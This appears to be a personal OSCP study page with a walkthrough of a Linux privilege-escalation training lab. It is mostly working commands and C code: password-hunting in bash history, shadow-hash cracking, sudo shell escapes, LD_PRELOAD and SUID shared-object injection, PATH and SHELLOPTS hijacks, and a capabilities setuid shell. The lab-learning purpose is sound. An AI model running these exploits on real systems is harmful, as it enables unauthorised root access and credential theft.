0Sec
0Sec
Elite0Sec
0Sec
Elite0Sec
  • Spider Security
  • offensive security
    • OSCP
      • WriteUps
        • PortSwigger
          • SQL injection labs
          • Exploiting XXE to retrieve data by repurposing a local DTD
        • PentesterLabs
          • Recon
        • HTB
          • BoardLight
          • Lame
        • THM
          • Walkthroughs
            • Attacktive Directory
            • LineKernel
            • Day 1 — Linux PrivEsc
          • CTF
            • Page
            • BLUE
            • mKingdom
            • RazorBlack
      • Module 1 (General Info)
      • Module 2 (Getting Kali)
        • Leason 1 - Booting Up Kali Linux
        • Leason 2 - The Kali Menu
        • Leason 4 - Finding Your Way Around Kali
        • Leason 5 - Managing Kali Linux Services
      • Module 3 (CLI)
        • The Bash Environment
        • Piping and Redirection
        • Text Searching and Manipulation
          • Regular
        • Managing Processes
        • File and Command Monitoring
      • Module 4 (Practical Tools)
        • Netcat
        • Socat
        • PowerShell & Powercat
        • Wireshark
        • Tcpdump
      • Module 5 (Bash Script)
      • Module 6 (Passive Info Gathering)
      • Module 7 ( Active Info Gathering)
      • Module 8 (Vulnerability Scanning)
      • Module 9 (Web Application Attacks)
        • Cross Site Scripting (XSS)
        • local file inclusion & remote file inclusion
          • Exploit LFI
        • SQL injection
          • Blind Boolean based SQL & Evasion Techniques
          • SQL
          • Login bypass List
        • File upload
        • Remote code execution
      • Module 10 ( Intro Buffer OverFlow)
      • Module 11 (Widows Buffer OverFlow)
        • Buffer OverFlow Challange
      • Module 12 (Linux Buffer OverFlows)
      • Module 13 (Clint Side Attacks)
      • Module 14 (Locating Public Exploits)
      • Module 15 (FIxing Exploits)
      • Module 16 (File Transfers)
      • Module 17 (Antivirus Evasion)
        • Windows
      • Module 18 (Privllege Escalation)
        • Windows
          • Checklist
          • THM - Windows PrivEsc Arena
        • Linux
          • Checklist
          • Linux PrivEsc Arena
      • Module 19 (Password Attacks)
      • Module 20 (Port Redirection and Tunneling)
      • Module 21 (Active Directory Attacks)
        • adbasics_v1.2
      • Module 22 (Metasploit Framwork)
      • Module 23 (Powershell Empire)
      • Course Materials
  • SANS
  • AppSec
    • EWAPTX
      • PHP Type Juggling
      • CSP
      • SqlI
        • Information_schema
        • WriteUps
      • SSTI & CSTI
      • XSS_HTML Injection
      • CORS Attack
      • Clickjacking
      • Open redirect
      • JSONP
      • LFI && LFD && RFI
      • HTTP Host header attacks
      • CSRF
      • XML injection
      • XML external entity (XXE) injection
      • APIs & JWT attacks
      • Insecure Deserialization
      • OAUTH 2.0 authentication vulnerabilities
      • Host Header Injection
      • Insecure Direct Object References (IDOR)
  • Reverse Eng & Malware dev
    • Internals
      • Windows internals
        • Topics in GitHub
        • Chapter 1 Concepts and tools
        • Chapter 2. System architecture
        • Chapter 3. Processes and jobs
        • Chapter 4. Threads
        • Chapter 5. Memory management
        • Chapter 6. I/O system
        • Chapter 7. Security
      • Linux internals ⇒ Soon
      • MacOs X internals ⇒ Soon
  • cheat sheet
    • Pentest_Notes
    • Linux BOF & Wireless Attacks
    • WriteUps
Powered by GitBook
On this page
  • Privilege Escalation - Kernel Exploits
  • Detection
  • Privilege Escalation - Stored Passwords (Config Files & History)
  • Privilege Escalation - SSH Keys
  • Privilege Escalation - Sudo (LD_PRELOAD)
  • Privilege Escalation - SUID (Shared Object Injection)
  • Privilege Escalation - SUID (Environment Variables #1,2)
  • Privilege Escalation - Capabilities
  1. offensive security
  2. OSCP
  3. Module 18 (Privllege Escalation)
  4. Linux

Linux PrivEsc Arena

PreviousChecklistNextModule 19 (Password Attacks)

Last updated 9 months ago

Connection SSH 

 ssh -oHostKeyAlgorithms=+ssh-dss TCM@10.10.19.42

Privilege Escalation - Kernel Exploits

Detection

/home/user/tools/linux-exploit-suggester/linux-exploit-suggester.sh

Privilege Escalation - Stored Passwords (Config Files & History)

History!

 cat ~/.bash_history | grep -i passw

What was TCM trying to log into?

Who was TCM trying to log in as?

Who was TCM trying to log in as?

unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt
hashcat -m 1800 unshadowed.txt rockyou.txt -O

Privilege Escalation - SSH Keys

find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
sudo find /bin -name nano -exec /bin/sh \;
sudo awk 'BEGIN {system("/bin/sh")}'
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
sudo vim -c '!sh'
sudo apache2 -f /etc/shadow

john --wordlist=/usr/share/wordlists/nmap.lst hash.txt

Privilege Escalation - Sudo (LD_PRELOAD)

  1. In command prompt type: sudo -l

  2. From the output, notice that the LD_PRELOAD environment variable is intact.


#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
    }
    
    /*
        gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles
        sudo LD_PRELOAD=/tmp/x.so apache2
    */
gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles
sudo LD_PRELOAD=/tmp/x.so apache2

Privilege Escalation - SUID (Shared Object Injection)

Detection

find / -type f -perm -04000 -ls 2>/dev/null
strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"

Exploitation

 mkdir /home/user/.config
 cd /home/user/.config
 nano libcalc.c
#[code]
#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c
/usr/local/bin/suid-so

Privilege Escalation - SUID (Environment Variables #1,2)

#1 Detection

 find / -type f -perm -04000 -ls 2>/dev/null
 strings /usr/local/bin/suid-env

Exploitation

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
 gcc /tmp/service.c -o /tmp/service
 export PATH=/tmp:$PATH
 /usr/local/bin/suid-env

#2 Detection

 find / -type f -perm -04000 -ls 2>/dev/null
 /usr/local/bin/suid-env2
#1
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service
/usr/local/bin/suid-env2

#2
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'

Privilege Escalation - Capabilities

 getcap -r / 2>/dev/null
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'

https://github.com/dirtycow/dirtycow.github.io/blob/master/dirtyc0w.c
Config File